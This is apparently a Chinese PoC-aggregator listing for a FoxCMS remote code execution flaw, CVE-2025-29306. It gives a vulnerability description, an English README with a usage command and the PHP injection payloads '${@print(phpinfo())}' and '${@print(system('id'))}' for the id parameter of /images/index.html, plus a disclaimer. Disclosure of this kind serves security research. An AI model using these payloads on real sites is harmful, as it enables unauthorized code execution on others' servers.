POC详情: e54d4cc1d9629d5f4742278a3e2a0dafd05e7346

来源
关联漏洞
标题: FoxCMS 安全漏洞 (CVE-2025-29306)
描述:FoxCMS是中国黔狐(FoxCMS)公司的一套可免费商用开源的内容管理系统。 FoxCMS 1.2.5版本存在安全漏洞,该漏洞源于index.html组件允许执行任意代码。
介绍
# FOXCMS Parameter Injection RCE – CVE-2025-29306

This repository contains a Python-based PoC for a Remote Code Execution (RCE) vulnerability affecting FOXCMS v1.2, a Chinese open-source content management system.

> CVE-ID: CVE-2025-29306  
> Affects: FOXCMS v1.2  
> Type: Service Parameter Injection → Code Execution  

---

##  Vulnerability Summary

FOXCMS suffers from an insecure parameter parsing mechanism in the `id` parameter on the `/images/index.html` endpoint. This allows payload injection using `${@print()}` expressions, leading to PHP code execution.

---

## PoC Usage

### Requirements

- Python 3.x  
- `requests` library

```bash
pip install requests

# Usage 
python foxcms_poc.py http://target.com/images/index.html?id=

# The script uses payloads like:

${@print(phpinfo())}
${@print(system('id'))}

# 🔐 Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.

Author
Inok009
文件快照

[4.0K] /data/pocs/e54d4cc1d9629d5f4742278a3e2a0dafd05e7346 ├── [2.6K] CVE_2025_29306.py └── [1014] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。